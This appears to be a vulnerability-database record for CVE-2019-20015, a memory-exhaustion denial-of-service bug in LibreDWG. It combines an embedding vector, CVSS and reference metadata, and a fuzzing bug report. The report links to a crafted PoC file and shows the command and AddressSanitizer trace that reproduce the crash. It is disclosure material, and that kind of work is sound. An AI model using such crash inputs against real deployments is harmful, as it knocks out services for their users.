-0.02797763980925083, 0.007103069219738245, 0.0047528184950351715, -0.02284250408411026, -0.0035676320549100637, -0.014560285024344921, 0.0034388513304293156, 0.004982209298759699, -0.006805263459682465, 0.014664920046925545, 0.010527835227549076, 0.008829537779092789, 0.005992334336042404, 0.0014538151444867253, 0.0071231909096241, 0.006334408186376095, 0.00748538738116622, 0.017482001334428787, 0.0012485706247389317, 0.00046683059190399945, -0.0034770830534398556, 0.0006554744322784245, -0.017562489956617355, -0.016451753675937653, 0.0013924429658800364, -0.007481362670660019, -0.014536138623952866, 0.01435906533151865, -0.008386853151023388, 0.017546391114592552, -0.00962636899203062, -0.0051512341015040874, -0.0053162346594035625, -0.01806151494383812, -0.0003292463661637157, 0.03621961548924446, -0.022874699905514717, 0.018946882337331772, -0.023422017693519592, 0.005034526344388723, 0.004748793784528971, -0.009875881485641003, -0.01846395432949066, -0.021892745047807693, -0.017063463106751442, -0.006595994345843792, 0.006909897550940514, 0.0075538018718361855, 0.00009853496158029884, 0.00649940874427557, 0.0013723209267482162, -0.0024589095264673233, -0.006326359696686268, 0.007396850269287825, 0.0016952792648226023, 0.0052196490578353405, 0.031229358166456223, -0.014930530451238155, -0.0002324092056369409, 0.009827588684856892, -0.03279082477092743, 0.004455012734979391, 0.011517837643623352, -0.003565619932487607, 0.003790986491367221, 0.0037869620136916637, 0.006664409302175045, -0.015107603743672371, -0.0025072023272514343, -0.005372576415538788, -0.0008556884131394327, -0.004764891695231199, -0.001327046426013112, 0.004330256022512913, 0.002215433167293668, 0.005352454259991646, -0.000014108986761129927, 0.019542494788765907, -0.006632213946431875, -0.02635178156197071, 0.021908842027187347, 0.00657587219029665, 0.04629671573638916, -0.003147082170471549, -0.004024401772767305, -0.007501484826207161, 0.0017033279873430729, -0.004064645618200302, -0.0008089047623798251, 0.008173559792339802, -0.01999322697520256, 0.0015292726457118988, -0.007348557468503714, 0.010592225007712841, -0.014045162126421928, 0.0055898940190672874, -0.010817592032253742, -0.014045162126421928, 0.01527662854641676, -0.0072036790661513805, 0.02770398184657097, 0.009368807077407837, -0.0017496086657047272, -0.005380624905228615, -0.0010352773824706674, 0.012435400858521461, 0.0019598836079239845, 0.008322462439537048, -0.013884185813367367, 0.006583921145647764, -0.005622089374810457, -0.010036857798695564, -0.011912229470908642, -0.0021912867669016123, -0.023695677518844604, 0.01218588836491108, -0.0021268962882459164, 0.0004695973766501993, 0.004358427133411169, -0.01472930982708931, 0.003521351609379053, 0.0023683602921664715, 0.017900539562106133, -0.0031128746923059225, -0.007143313065171242, 0.010592225007712841, -0.013320770114660263, -0.02319665066897869, 0.0005422881222330034, 0.011469544842839241, 0.001152991084381938, 0.0023361651692539454, -0.011220032349228859, -0.04095230996608734, 0.0014528089668601751, -0.0032718386501073837, 0.008676609955728054, -0.0013813759433105588, -0.0146890664473176, 0.015630776062607765, -0.014769554138183594, 0.012314668856561184, -0.008068925701081753, 0.010189784690737724, 0.006443066988140345, 0.012371011078357697, 0.01435906533151865, -0.005187453702092171, -0.007915997877717018, -0.014318821020424366, 0.005642211064696312, 0.004945989698171616, 0.02660934440791607, -0.017256634309887886, 0.0026943369302898645, 0.013682966120541096, -0.0035797052551060915, -0.0009482496534474194, 0.01836736872792244, 0.0036984251346439123, -0.017047366127371788, -0.008241974748671055, 0.023261042311787605, 0.01105100754648447, 0.007541728671640158, 0.005336356814950705, -0.016009069979190826, -0.002734581008553505, 0.005835382267832756, -0.00034282871638424695, -0.0009678686037659645, -0.0030283622909337282, 0.002990130567923188, 0.006921970751136541, -0.005022453144192696, -0.0023140308912843466, -0.016298826783895493, 0.012049058452248573, 0.006861604750156403, 0.009457344189286232, -0.0011288446839898825, -0.007239898666739464, -0.022987382486462593, 0.003726596012711525, 0.012540035881102085, -0.007082947064191103, -0.0011479605454951525, 0.0028533008880913258, 0.021232742816209793, 0.0067167263478040695, 0.010085150599479675, 0.03187325969338417, -0.018962981179356575, 0.02205372229218483, -0.02103957161307335, -0.006439042743295431, 0.015880288556218147, 0.0021953112445771694, 0.017562489956617355, 0.0017123828874900937, -0.018737614154815674, -0.013143695890903473, 0.021538598462939262, -0.001227442524395883, -0.016870291903614998, 0.000792304112110287, -0.011880033649504185, 0.0036279980558902025, 0.0077188024297356606, 0.016677120700478554, -0.0070386785082519054, 0.008644415065646172, 0.0006333402125164866, -0.001629882724955678, 0.010189784690737724, -0.002456897171214223, 0.02770398184657097, 0.0005292088026180863, 0.013103451579809189, -0.004129036329686642, 0.012008815072476864, 0.005002331454306841, 0.0042175729759037495, -0.01354613620787859, 0.013296622782945633, 0.026239098981022835, -0.005855504423379898, 0.025756170973181725, -0.014004917815327644, -0.000583035172894597, -0.009409051388502121, 0.01976786181330681, 0.010600274428725243, -0.005827333778142929, -0.007662460673600435, -0.028524959459900856, -0.015284677967429161, 0.013932478614151478, -0.01369906309992075, 0.01538931205868721, -0.01955859176814556, 0.011034909635782242, 0.03219521418213844, -0.00929636787623167, 0.008105144836008549, 0.008781244978308678, 0.010133443400263786, 0.014238333329558372, 0.011622471734881401, 0.002998179290443659, 0.0008164505125023425, -0.017787855118513107, -0.01391638070344925, -0.0006418920820578933, 0.03734644874930382, 0.006664409302175045, 0.01021393109112978, -0.02472592331469059, -0.005650260020047426, 0.0033865340519696474, -0.01625053398311138, 0.015864191576838493, -0.003988182172179222, 0.0008421060629189014, 0.0013793637044727802, 0.005541601218283176, -0.008237950503826141, -0.008974416181445122, 0.020685425028204918, 0.003094764892011881, -0.011759301647543907, 0.009642466902732849, -0.0002731562708504498, 0.013208086602389812, 0.013530038297176361, -0.01564687304198742, 0.028830813243985176, 0.012153693474829197, -0.013570282608270645, 0.001600705785676837, -0.004861477296799421, -0.006676482502371073, 0.012837841175496578, 0.0015212238067761064, 0.010052955709397793, -0.001284790225327015, -0.024613240733742714, 0.023035675287246704, -0.005223673302680254, -0.0300381351262331, 0.007879778742790222, -0.0024890925269573927, -0.0018864383455365896, -0.004022389650344849, 0.01907566376030445, -0.013707112520933151, 0.014004917815327644, 0.0032094602938741446, -0.03657376393675804, 0.006430993787944317, -0.014431504532694817, 0.018142003566026688, 0.003398607252165675, -0.01284589059650898, 0.018206393346190453, 0.010286371223628521, 0.024693729355931282, -0.013200037181377411, -0.0022798236459493637, -0.022021526470780373, 0.0012606438249349594, 0.003953974694013596, -0.0010664664441719651, 0.013103451579809189, 0.0007435082225129008, 0.0015081445453688502, 0.01628272980451584, -0.003893608693033457, 0.0020947011653333902, 0.0015986935468390584, -0.02780056744813919, -0.008652463555335999, 0.004370500333607197, -0.013505891896784306, 0.0010287376353517175, -0.0019830239471048117, -0.01170296035706997, -0.005694528575986624, -0.019719569012522697, 0.0013260403648018837, -0.0035374490544199944, -0.00833051186054945, 0.017642976716160774, -0.00973100308328867, -0.005871601868420839, -0.010141491889953613, -0.008555877953767776, 0.010696860030293465, -0.002821105532348156, 0.006334408186376095, 0.007606119383126497, 0.01060832291841507, 0.014342967420816422, -0.026416173204779625, -0.0007208709721453488, 0.00653160410001874, -0.011558081954717636, -0.011839790269732475, -0.0009170605335384607, 0.005855504423379898, 0.006970263551920652, -0.02442006953060627, -0.01714395172894001, 0.0029780573677271605, -0.005380624905228615, -0.01955859176814556, -0.0011107348836958408, 0.0028613496106117964, 0.013361013494431973, 0.0019568654242902994, -0.0003536443109624088, -0.007187581621110439, 0.0005875626229681075, 0.013666868209838867, 0.011984668672084808, 0.03077862411737442, -0.00532830785959959, 0.016934681683778763, 0.0041692801751196384, -0.013312720693647861, 0.02358299493789673, 0.00962636899203062, -0.02227908745408058, -0.011976619251072407, -0.0011288446839898825, 0.0144717488437891, -0.010970518924295902, 0.018447857350111008, 0.008427097462117672, 0.011067104525864124, -0.015880288556218147, -0.00513916090130806, -0.030504964292049408, -0.004728672094643116, -0.0028231178876012564, -0.008346608839929104, 0.01306320820003748, 0.004603915382176638, 0.008149413391947746, 0.011340764351189137, -0.009199782274663448, 0.00019593806064222008, -0.0027003735303878784, 0.002895557088777423, 0.0020122008863836527, 0.025321535766124725, -0.014165894128382206, 0.015566385351121426, -0.009312465786933899, -0.010616371408104897, -0.0071553862653672695, -0.02047615498304367, -0.006430993787944317, 0.008129291236400604, -0.014085406437516212, -0.01628272980451584, -0.014165894128382206, -0.024452265352010727, 0.0032718386501073837, 0.021168353036046028, 0.016902487725019455, -0.0023764092475175858, -0.02503177896142006, -0.014721261337399483, 0.0021812256891280413, 0.021506402641534805, -0.019703470170497894, -0.006350506097078323, -0.0052478197030723095, 0.0151237016543746, 0.001913603045977652, -0.005461113061755896, -0.009046855382621288, -0.005163307301700115, 0.011163690127432346, -0.016451753675937653, -0.03972889482975006, 0.0008320450433529913, 0.01238710805773735, 0.014930530451238155, -0.003823181614279747, -0.004120987374335527, 0.007509533781558275, -0.013208086602389812, 0.008732951246201992, -0.02279421128332615, -0.004229646176099777, -0.0022496406454592943, 0.0023623236920684576, 0.009642466902732849, 0.003990194294601679, -0.000021033787561464123, -0.007026605308055878, -0.001146954484283924, 0.00040017644641920924, 0.013980771414935589, 0.019011273980140686, 0.002106774365529418, -0.0088778305798769, -0.012306620366871357, -0.0067086778581142426, 0.0008873805636540055, -0.012322718277573586, 0.00698233675211668, 0.01251588948071003, 0.01833517476916313, -0.008241974748671055, 0.0002824626863002777, -0.012853939086198807, 0.014455650933086872, 0.00005061942647444084, 0.026158610358834267, -0.011896131560206413, -0.02253665030002594, -0.003839279292151332, 0.004768915940076113, -0.0009819540427997708, 0.008950269781053066, 0.01098661683499813, 0.0004504814569372684, -0.008958318270742893, 0.015662971884012222, 0.0006222731317393482, -0.011389057151973248, -0.030183013528585434, -0.0300381351262331, 0.011437349952757359, -0.0034509245306253433, 0.019800055772066116, 0.0007540722726844251, -0.008869781158864498, -0.010793445631861687, -0.017868343740701675, 0.007911973632872105, 0.010052955709397793, 0.008322462439537048, -0.0062700179405510426, 0.004042511340230703, 0.020926889032125473, 0.01067271362990141, 0.0037668400909751654, -0.004010316450148821, -0.004575744736939669, -0.0036501323338598013, -0.011558081954717636, -0.016500046476721764, -0.011807594448328018, -0.0004831797268707305, 0.006177456583827734, 0.016041265800595284, 0.003533424809575081, 0.014326870441436768, -0.000023423275706591085, -0.026416173204779625, 0.006656360346823931, 0.011340764351189137, 0.007819412276148796, 0.0015825959853827953, 0.0003674781764857471, 0.01933322660624981, 0.007191605865955353, -0.003082691691815853, -0.01545370277017355, 0.0005699559114873409, 0.014946628361940384, 0.026496659964323044, -0.010970518924295902, 0.02714056521654129, 0.018818102777004242, -0.00999661348760128, 0.009006611071527004, -0.00123046082444489, 0.0038493401370942593, 0.007195630110800266, 0.025659585371613503, 0.028154714033007622, -0.002364336047321558, 0.02065322920680046, -0.011928326450288296, -0.003992206417024136, 0.022745918482542038, 0.014431504532694817, 0.018834199756383896, 0.0027526908088475466, 0.02213420905172825, -0.02055664360523224, 0.0021047620102763176, -0.000119160016765818, 0.029523011296987534, -0.006032578181475401, -0.0067086778581142426, -0.006773068103939295, -0.00028045050567016006, -0.0013039062032476068, 0.043817684054374695, -0.011381007730960846, -0.03477083146572113, -0.001603724085725844, 0.00657587219029665, -0.014946628361940384, -0.015550288371741772, 0.001932718907482922, -0.0008692707633599639, 0.029168862849473953, -0.005412820260971785, 0.0026198856066912413, 0.022633235901594162, 0.0012978696031495929, -0.013288574293255806, -0.004233670420944691, 0.009755149483680725, 0.007771119475364685, 0.017997125163674355, -0.008998562581837177, -0.003957998938858509, -0.013409306295216084, 0.0041089141741395, 0.005779040977358818, -0.00062478834297508, 0.008314413949847221, -0.004322207532823086, -0.004277938976883888, -0.01981615461409092, 0.023341529071331024, -0.01420613843947649, 0.01691858470439911, -0.0131517443805933, -0.017304927110671997, -0.0007978376233950257, 0.003189338371157646, -0.022568844258785248, -0.01369906309992075, 0.0048494040966033936, 0.0062297736294567585, -0.02533763274550438, -0.002213421044871211, -0.006402823142707348, 0.012660767883062363, -0.0004806644865311682, 0.001919639646075666, 0.001906560268253088, -0.012113449163734913, -0.017127852886915207, 0.005489283706992865, -0.0028875081334263086, 0.002990130567923188, -0.011936375871300697, 0.005650260020047426, 0.005903797224164009, 0.020765913650393486, -0.0021107986103743315, 0.010181736201047897, 0.013087354600429535, -0.010205882601439953, 0.03148691728711128, 0.005376600660383701, -0.00854782946407795, 0.001600705785676837, 0.0144717488437891, -0.01714395172894001, -0.012789548374712467, -0.012193936854600906, 0.019494201987981796, 0.00510696554556489, 0.01098661683499813, -0.011115397326648235, 0.011759301647543907, -0.003925804048776627, 0.012282473966479301, 0.011179788038134575, -0.007481362670660019, -0.010012711398303509, 0.0000011043524636988877, 0.022939089685678482, 0.021780062466859818, -0.009650515392422676, 0.00016676115046720952, 0.015308824367821217, 0.006515506189316511, -0.01185588724911213, -0.020057618618011475, 0.007658436428755522, -0.0032034236937761307, -0.0005317240720614791, 0.019317127764225006, -0.006930019706487656, -0.011477593332529068, 0.000705276383087039, 0.030279599130153656, -0.014761505648493767, -0.019574690610170364, -0.00679721450433135, 0.01722443848848343, -0.013650770299136639, -0.01376345381140709, 0.0031752530485391617, 0.022440064698457718, 0.013031012378633022, -0.004853428341448307, 0.01597687415778637, -0.001997109269723296, -0.0002009685558732599, 0.03393375501036644, -0.018560539931058884, 0.006966239307075739, -0.006487335544079542, 0.004088792018592358, -0.004149158019572496, -0.003990194294601679, -0.008250023238360882, -0.00536050321534276, -0.027204954996705055, 0.0016640900867059827, 0.0016067423857748508, 0.03438448905944824, 0.02161908522248268, 0.008998562581837177, -0.015147848054766655, -0.0006574866129085422, -0.006177456583827734, 0.01823858916759491, 0.005110990256071091, 0.012000765651464462, -0.0006071816314943135, -0.0008265114738605917, 0.00451537873595953, 0.003360375529155135, -0.006724775303155184, 0.06274846941232681, 0.005022453144192696, 0.031229358166456223, 0.014125649817287922, 0.0012717109639197588, 0.013457599096000195, -0.003040435491129756, 0.017562489956617355, -0.011211982928216457, 0.0273981261998415, -0.0074773384258151054, 0.010962470434606075, 0.014833944849669933, 0.001056405482813716, 0.002577629406005144, -0.007763070985674858, -0.019751762971282005, 0.008040755055844784, -0.02683471143245697, -0.015163945965468884, -0.0021590914111584425, 0.0005206569912843406, 0.008085022680461407, -0.00848343875259161, -0.019107859581708908, 0.012620523571968079, -0.014681017026305199, 0.005384649615734816, -0.001043326104991138, -0.02218250185251236, 0.015840044245123863, -0.001236497424542904, -0.0026782392524182796, 0.0074773384258151054, 0.01582394726574421, 0.02055664360523224, -0.008346608839929104, 0.013312720693647861, -0.008853684179484844, -0.0039720842614769936, -0.013369062915444374, 0.015051262453198433, -0.001388418604619801, -0.012346864677965641, 0.004084767773747444, -0.003613912733271718, -0.019800055772066116, -0.026496659964323044, 0.01823858916759491, -0.005461113061755896, -0.00253134872764349, -0.00525184441357851, -0.004434890579432249, 0.0042940364219248295, 0.014608577825129032, -0.018142003566026688, -0.015341019257903099, 0.004330256022512913, -0.014528090134263039, 0.0009029751527123153, -0.008427097462117672, -0.008282219059765339, -0.012266376055777073, 0.0029458620119839907, -0.010551981627941132, 0.019526397809386253, 0.010036857798695564, -0.005956114735454321, -0.002010188763961196, -0.0070386785082519054, -0.0144717488437891, -0.00392982829362154, 0.005839406978338957, -0.004233670420944691, -0.007207703310996294, 0.0006544683128595352, 0.01859273575246334, 0.002299945568665862, 0.007207703310996294, -0.004740745294839144, 0.002750678453594446, -0.016089558601379395, 0.005750869866460562, -0.007867705076932907, -0.008676609955728054, -0.010093199089169502, -0.007247947622090578, -0.006048675626516342, 0.0004145133716519922, 0.017787855118513107, 0.0014387236442416906, 0.026818612590432167, -0.010817592032253742, 0.017353219911456108, 0.0033704363740980625, -0.013183940201997757, 0.003813120536506176, 0.009328562766313553, 0.0070869713090360165, 0.02218250185251236, -0.005231722258031368, 0.007099044509232044, -0.025192754343152046, -0.010632469318807125, -0.008193681947886944, -0.012258327566087246, -0.011541984044015408, -0.022262990474700928, -0.025595195591449738, -0.015067360363900661, -0.014487845823168755, 0.007827461697161198, -0.021602988243103027, -0.004789038095623255, 0.011211982928216457, -0.006346481386572123, -0.01045539602637291, -0.004471110180020332, 0.003658181056380272, 0.008523683063685894, -0.013755405321717262, -0.0023140308912843466, 0.026512758806347847, 0.004442939534783363, 0.015421506948769093, 0.0009281276725232601, -0.005585869774222374, -0.00590782193467021, -0.019268834963440895, 0.018882492557168007, 0.01203296147286892, -0.018962981179356575, 0.005493308417499065, 0.013071256689727306, -0.006048675626516342, 0.02134542725980282, -0.007066849619150162, 0.023904945701360703, 0.0024407997261732817, -0.00437452457845211, -0.014351016841828823, 0.03589766472578049, -0.005493308417499065, 0.0023784213699400425, -0.02406592294573784, 0.0036762908566743135, -0.022214697673916817, -0.028750326484441757, 0.0003974096616730094, -0.02749471180140972, 0.011107348836958408, -0.011847838759422302, 0.013642721809446812, 0.008998562581837177, -0.003147082170471549, 0.029651790857315063, -0.006362579297274351, 0.033257655799388885, -0.007207703310996294, -0.00723587442189455, -0.010560030117630959, -0.0017113768262788653, -0.008990513160824776, -0.0012022900627925992, 0.0051431856118142605, 0.013642721809446812, 0.008459292352199554, 0.0024146409705281258, 0.01288613397628069, 0.006366603542119265, 0.011759301647543907, 0.007932095788419247, 0.0007153374026529491, -0.00903075747191906, 0.014914432540535927, 0.00793612003326416, -0.0014357053441926837, 0.00411495054140687, 0.02950691245496273, 0.013457599096000195, -0.002045402070507407, 0.014922481961548328, -0.03982548043131828, 0.004740745294839144, 0.017160048708319664, 0.0034408634528517723, -0.003988182172179222, 0.0006202608929015696, -0.002670190529897809, 0.0138117466121912, -0.0010574115440249443, -0.018174197524785995, 0.013240281492471695, -0.015534190461039543, -0.017031267285346985, 0.015027116052806377, -0.0016308887861669064, 0.00752965547144413, 0.021474206820130348, -0.008765147067606449, -0.0005915870424360037, -0.014479797333478928, -0.021908842027187347, 0.008197706192731857 ]
1,684
CVE-2019-20015
2019-12-27T01:15:13.647000
An issue was discovered in GNU LibreDWG 0.92. Crafted input will lead to an attempted excessive memory allocation in dwg_decode_LWPOLYLINE_private in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00033.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00045.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643028" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6967607-F26E-477A-8D60-8B0D55594EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643028
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 